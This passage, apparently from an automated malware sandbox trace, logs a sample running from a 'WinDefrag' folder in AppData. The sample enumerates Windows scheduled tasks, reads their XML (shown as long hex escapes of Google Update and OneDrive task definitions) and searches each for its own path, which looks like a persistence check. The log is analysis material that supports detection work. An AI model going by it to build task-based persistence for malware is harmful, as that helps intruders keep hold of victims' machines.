x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.305] IUnknown:Release (This=0x326990) returned 0x0 [0169.305] IRegisteredTaskCollection:get_Item (in: This=0x3267f0, index=0x18e720*(varType=0x3, wReserved1=0x39, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x18e6e8 | out: ppRegisteredTask=0x18e6e8*=0x326990) returned 0x0 [0169.305] IRegisteredTask:get_Name (in: This=0x326990, pName=0x18e6e0 | out: pName=0x18e6e0*="GoogleUpdateTaskMachineUA") returned 0x0 [0169.305] IRegisteredTask:get_Xml (in: This=0x326990, pXml=0x18e6d0 | out: pXml=0x18e6d0*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x39\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0 [0169.307] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x39\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.307] IUnknown:Release (This=0x326990) returned 0x0 [0169.307] IRegisteredTaskCollection:get_Item (in: This=0x3267f0, index=0x18e720*(varType=0x3, wReserved1=0x39, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x18e6e8 | out: ppRegisteredTask=0x18e6e8*=0x326990) returned 0x0 [0169.307] IRegisteredTask:get_Name (in: This=0x326990, pName=0x18e6e0 | out: pName=0x18e6e0*="OneDrive Standalone Update Task-S-1-5-21-2345716840-1148442690-1481144037-1000") returned 0x0 [0169.307] IRegisteredTask:get_Xml (in: This=0x326990, pXml=0x18e6d0 | out: pXml=0x18e6d0*="\r\n\r\n \r\n Microsoft Corporation\r\n \r\n \r\n \r\n 1992-05-01T04:00:00\r\n true\r\n \r\n P1D\r\n false\r\n \r\n P1D\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\r\n \r\n \r\n \r\n \r\n \r\n YKYD69Q\\aETAdzjz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n") returned 0x0 [0169.316] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft Corporation\r\n \r\n \r\n \r\n 